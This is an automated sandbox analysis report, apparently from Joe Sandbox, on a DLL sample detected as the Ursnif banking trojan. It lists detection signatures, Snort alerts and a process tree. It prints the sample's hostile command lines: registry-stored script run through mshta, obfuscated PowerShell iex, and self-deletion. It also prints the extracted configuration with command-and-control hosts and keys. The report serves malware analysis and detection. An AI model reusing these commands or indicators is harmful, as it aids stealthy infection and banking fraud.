Edit tour
Windows
Analysis Report
626a961800203.rar
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Classification
- System is w10x64
- loaddll32.exe (PID: 6352 cmdline:
loaddll32. exe "C:\Us ers\user\D esktop\626 a961800203 .dll" MD5: 7DEB5DB86C0AC789123DEC286286B938) - cmd.exe (PID: 6368 cmdline:
cmd.exe /C rundll32. exe "C:\Us ers\user\D esktop\626 a961800203 .dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D) - rundll32.exe (PID: 6388 cmdline:
rundll32.e xe "C:\Use rs\user\De sktop\626a 961800203. dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) - control.exe (PID: 2300 cmdline:
C:\Windows \system32\ control.ex e -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F) - rundll32.exe (PID: 1408 cmdline:
"C:\Window s\system32 \rundll32. exe" Shell 32.dll,Con trol_RunDL L -h MD5: 73C519F050C20580F8A62C849D49215A)
- mshta.exe (PID: 6228 cmdline:
C:\Windows \System32\ mshta.exe" "about:<h ta:applica tion><scri pt>Qbwe='w script.she ll';resize To(0,2);ev al(new Act iveXObject (Qbwe).reg read('HKCU \\\Softwar e\\AppData Low\\Softw are\\Micro soft\\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E\\\TestL ocal'));if (!window.f lag)close( )</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB) - powershell.exe (PID: 6648 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" new-alias -name elht huju -valu e gp; new- alias -nam e fwiwawp -value iex ; fwiwawp ([System.T ext.Encodi ng]::ASCII .GetString ((elhthuju "HKCU:Sof tware\AppD ataLow\Sof tware\Micr osoft\54E8 0703-A337- A6B8-CDC8- 873A517CAB 0E").UrlsR eturn)) MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - csc.exe (PID: 6460 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\boqgffz j\boqgffzj .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 488 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESAFF5.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\boq gffzj\CSC6 A71A2D878D 54201A284C ABB415B85E F.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - csc.exe (PID: 3724 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cs c.exe" /no config /fu llpaths @" C:\Users\u ser\AppDat a\Local\Te mp\yb3ge0m 0\yb3ge0m0 .cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D) - cvtres.exe (PID: 2980 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESC0EC.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\yb3 ge0m0\CSCC D644729527 F4748ACD06 F6743FBF14 8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D) - explorer.exe (PID: 3616 cmdline:
C:\Windows \Explorer. EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D) - cmd.exe (PID: 3684 cmdline:
C:\Windows \System32\ cmd.exe" / C ping loc alhost -n 5 && del " C:\Users\u ser\Deskto p\626a9618 00203.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 6796 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - PING.EXE (PID: 6784 cmdline:
ping local host -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B) - RuntimeBroker.exe (PID: 4440 cmdline:
C:\Windows \System32\ RuntimeBro ker.exe -E mbedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5) - cmd.exe (PID: 1300 cmdline:
cmd /C "ns lookup myi p.opendns. com resolv er1.opendn s.com > C: \Users\use r\AppData\ Local\Temp \92B2.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 1048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
{"RSA Public Key": "+FflIsIAzGiUM0s27tuLbRAwZqYoqmNsTeF7rxG/Mwp38QqxThLLXpreOfEHBItOJka6enf+5fp9fT9wIfjoNQYondBMg0CXVUaaXZmXPw7dFUCTuwl/1fJ8Te0BDO4/e0D+MT+n6Ovzq2MwCzSIm7W4ZiEEkdm60WNeCsFwnx1f78Cv9j4wv9nLP3bFRx9OkdD66cn4ATsp0wULyGpOtly6uJj4gNSoIxbBBQeCFBEVhnqZ/KZ3/SbtJUJ3X757TgS02V8uV2DJldCmSy1UGDylgn9Cs1EUm4RQgf1fFSmTn7kcnOpsq0753wd2/m9Jbas3/WEwOA88vTsSUvhPp7zr8Ltl9tao4hrJvcTrul8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "hopexmder.net", "94.140.114.144", "94.140.112.49", "94.140.112.121"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, calc no*ad *terminal* *debug*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 25 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Click to see the 2 entries |
System Summary |
---|
Source: | Author: Florian Roth: |
Source: | Author: Nikita Nazarov, oscd.community: |
Source: | Author: Michael Haag: |
Source: | Author: Florian Roth: |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Timestamp: | 04/28/22-15:36:09.408600 04/28/22-15:36:09.408600 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:36:11.602821 04/28/22-15:36:11.602821 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:35:48.541659 04/28/22-15:35:48.541659 |
SID: | 2033203 |
Source Port: | 49760 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 04/28/22-15:36:10.453628 04/28/22-15:36:10.453628 |
SID: | 2033203 |
Source Port: | 49763 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 2_2_05115FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_05FAFD47 |
Source: | Code function: | 2_2_05FA65C2 | |
Source: | Code function: | 2_2_05FA99BC | |
Source: | Code function: | 2_2_05FBBAD1 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Code function: | 2_2_05111CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Registry key value created / modified: | Jump to behavior |
Source: | Code function: | 2_2_05115FBB |
System Summary |
---|
Source: | Matched rule: |
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Code function: | 2_2_05114BF1 | |
Source: | Code function: | 2_2_05111645 | |
Source: | Code function: | 2_2_0511829C | |
Source: | Code function: | 2_2_05FC3DB0 | |
Source: | Code function: | 2_2_05FB154D | |
Source: | Code function: | 2_2_05FBD7F1 | |
Source: | Code function: | 2_2_05FA67CA | |
Source: | Code function: | 2_2_05FBFF4D | |
Source: | Code function: | 2_2_05FAB238 |
Source: | Code function: | 2_2_05FB8E57 |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Matched rule: |
Source: | Code function: | 2_2_05116D0A | |
Source: | Code function: | 2_2_0511190C | |
Source: | Code function: | 2_2_05114321 | |
Source: | Code function: | 2_2_051184C1 | |
Source: | Code function: | 2_2_05FB6DE0 | |
Source: | Code function: | 2_2_05FA74AE | |
Source: | Code function: | 2_2_05FAC431 | |
Source: | Code function: | 2_2_05FB0782 | |
Source: | Code function: | 2_2_05FBBE80 | |
Source: | Code function: | 2_2_05FB61AE | |
Source: | Code function: | 2_2_05FB7950 | |
Source: | Code function: | 2_2_05FA710A | |
Source: | Code function: | 2_2_05FB00DC | |
Source: | Code function: | 2_2_05FBA806 | |
Source: | Code function: | 2_2_05FB2331 | |
Source: | Code function: | 2_2_05FB5312 | |
Source: | Code function: | 2_2_05FA64C4 | |
Source: | Code function: | 2_2_05FAB7D5 | |
Source: | Code function: | 2_2_05FAD77A | |
Source: | Code function: | 2_2_05FA36BB | |
Source: | Code function: | 2_2_05FA10C7 | |
Source: | Code function: | 2_2_05FB3829 | |
Source: | Code function: | 2_2_05FBEAC5 | |
Source: | Code function: | 2_2_05FB5220 |
Source: | Binary or memory string: |
Source: | Static PE information: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Code function: | 2_2_051168BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 2_2_0511829B | |
Source: | Code function: | 2_2_05117EA9 | |
Source: | Code function: | 2_2_05FC3DAF | |
Source: | Code function: | 2_2_05FA3496 | |
Source: | Code function: | 2_2_05FC38A9 |
Source: | Code function: | 2_2_05FAEC00 |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Evasive API call chain: |
Source: | Last function: | ||
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Check user administrative privileges: |
Source: | Dropped PE file which has not been started: | Jump to dropped file | ||
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Code function: | 2_2_05FAFD47 |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 2_2_05FA65C2 | |
Source: | Code function: | 2_2_05FA99BC | |
Source: | Code function: | 2_2_05FBBAD1 |
Source: | Code function: | 2_2_05FAEC00 |
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 2_2_05FA8FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior | ||
Source: | Memory allocated: | Jump to behavior |
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior | ||
Source: | Thread created: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior | ||
Source: | Memory protected: | Jump to behavior |
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior | ||
Source: | Memory written: | Jump to behavior |
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior | ||
Source: | Thread register set: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
